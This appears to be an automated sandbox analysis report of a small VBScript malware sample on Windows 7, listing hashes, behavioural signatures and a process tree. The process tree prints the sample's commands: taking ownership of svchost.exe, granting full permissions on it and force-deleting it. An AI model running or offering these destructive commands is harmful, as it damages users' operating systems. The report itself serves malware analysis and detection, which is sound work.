Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240419-en
resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
submitted: 05-07-2024 11:24
Static task: static1
Behavioral task: behavioral1
Sample: code.vbs
Resource: win7-20240419-en (windows7-x64)
4 signatures
150 seconds
General
Target: code.vbs
Size: 271B
MD5: e0f806947d5250e613d90a08aabf53dd
SHA1: 8aed8a7c0e7cee223a2c1aa926154ade74c23316
SHA256: 15a06ed5f3fc9efb44cea8c22819b3350ca0a3bf6d81476c5eab5276fa6f1fa9
SHA512: 71af5e2c1afe5085a69a546ff7893df6c284cc85559220d61da7cb2ea7380138081e327ffe3dfc0f56ff9366e5ec0c96ec5b06e8ef3ff9c92b6135159457f44a
Malware Config
Signatures
Possible privilege escalation attempt (2 IoCs)
Processes:
  pid   process
  2656  takeown.exe
  2672  icacls.exe
Modifies file permissions (1 TTPs, 2 IoCs)
Processes:
  pid   process
  2656  takeown.exe
  2672  icacls.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Suspicious use of WriteProcessMemory (15 IoCs)
Processes:
  description                        pid   process      target process
  PID 3012 wrote to memory of 1268   3012  WScript.exe  cmd.exe
  PID 3012 wrote to memory of 1268   3012  WScript.exe  cmd.exe
  PID 3012 wrote to memory of 1268   3012  WScript.exe  cmd.exe
  PID 3012 wrote to memory of 2780   3012  WScript.exe  cmd.exe
  PID 3012 wrote to memory of 2780   3012  WScript.exe  cmd.exe
  PID 3012 wrote to memory of 2780   3012  WScript.exe  cmd.exe
  PID 3012 wrote to memory of 3032   3012  WScript.exe  cmd.exe
  PID 3012 wrote to memory of 3032   3012  WScript.exe  cmd.exe
  PID 3012 wrote to memory of 3032   3012  WScript.exe  cmd.exe
  PID 1268 wrote to memory of 2656   1268  cmd.exe      takeown.exe
  PID 1268 wrote to memory of 2656   1268  cmd.exe      takeown.exe
  PID 1268 wrote to memory of 2656   1268  cmd.exe      takeown.exe
  PID 2780 wrote to memory of 2672   2780  cmd.exe      icacls.exe
  PID 2780 wrote to memory of 2672   2780  cmd.exe      icacls.exe
  PID 2780 wrote to memory of 2672   2780  cmd.exe      icacls.exe
Processes (process tree; nesting shows parent/child depth)
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.vbs"
  - Suspicious use of WriteProcessMemory
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c takeown C:\Windows\System32\svchost.exe
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\takeown.exe
          Command line: takeown C:\Windows\System32\svchost.exe
          - Possible privilege escalation attempt
          - Modifies file permissions
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c icacls C:\Windows\System32\svchost.exe /grant Admin:(F)
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\icacls.exe
          Command line: icacls C:\Windows\System32\svchost.exe /grant Admin:(F)
          - Possible privilege escalation attempt
          - Modifies file permissions
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c del /f /s /q C:\Windows\System32\svchost.exe